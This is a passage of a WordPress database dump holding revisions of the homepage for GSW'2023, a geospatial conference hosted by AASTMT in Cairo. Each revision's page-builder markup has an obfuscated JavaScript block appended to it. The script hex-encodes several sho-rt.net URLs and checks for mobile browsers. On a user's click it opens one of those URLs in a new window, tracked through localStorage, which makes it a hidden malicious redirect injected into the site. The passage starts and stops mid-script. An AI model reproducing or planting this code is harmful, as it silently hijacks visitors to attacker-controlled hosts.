Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:39:39','2022-11-09 16:39:39','',3066,'https://gsw2023.com/?p=3166',0,'revision','',0),
(3167,1,'2022-11-09 16:47:07','2022-11-09 16:47:07','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT [rev_slider alias=\"the7-software-company-slider\" slidertitle=\"gsw2023\"][/rev_slider]GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:47:07','2022-11-09 16:47:07','',3066,'https://gsw2023.com/?p=3167',0,'revision','',0),
(3168,1,'2022-11-09 16:49:49','2022-11-09 16:49:49','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3><strong> EGYPT GSW\'2023</strong></h3>\r\n<h3><strong><span style=\"font-size: 14px;\">The First Geospatial Week in Africa and The Middle East</span></strong></h3>\r\n<h3>[rev_slider alias=\"the7-software-company-slider\" slidertitle=\"gsw2023\"][/rev_slider]</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return 